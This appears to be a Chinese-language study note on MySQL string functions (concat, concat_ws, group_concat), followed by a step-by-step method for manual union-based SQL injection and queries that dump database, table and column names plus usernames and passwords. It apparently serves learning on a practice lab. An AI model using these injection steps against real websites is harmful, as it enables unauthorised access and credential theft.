mysql学习笔记(二)
一.concat、concat_ws、group _concat函数
concat函数
1、功能:将多个字符串连接成一个字符串。
2、语法:concat(str1, str2,…)
返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null
select concat(name,sex) as info from pet
concat_ws函数
1、功能:和concat()一样,将多个字符串连接成一个字符串,但是可以一次性指定分隔符~(concat_ws就是concat with separator)
2、语法:concat_ws(separator, str1, str2, …)
说明:第一个参数指定分隔符。需要注意的是分隔符不能为null,如果为null,则返回结果为null。
select concat_ws(’,’,name,sex) as info from pet
group_concat()函数
1、功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。
2、语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )
说明:通过使用distinct可以排除重复值;如果希望对结果中的值进行排序,可以使用order by子句;separator是一个字符串值,缺省为一个逗号。
select owner,group_concat(name) from pet group by owner
二.sql注入一般步骤
1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。
2.接着尝试在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入。
3.输入–+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入
4.接着使用order by 语句判断,该表中一共有几列数据。
order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。
5.将id=1改为一个数据库不存在的id值,如861,使用union select 1,2,3联合查询语句查看页面是否有显示位。
6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
★判断是否是数据查询->判断能否sql字符注入->判断字符注入类型(单双引号等)->爆列数->测试显示位->爆相关信息
三.爆数据库名称、表明、列明、字段信息的语句
爆数据库名
select group_concat(schema_name) from information_schema.schemata
查询security内的所有表名
select group_concat(table_name) from information_schema.tables where table_schema=‘security’
爆破出列名
select group_concat(column_name) from information_schema.columns where table_name=‘users’
查看所有用户名
select group_concat(username) from users
查看所有密码
select group_concat(password)from security.users
参考博客链接: link.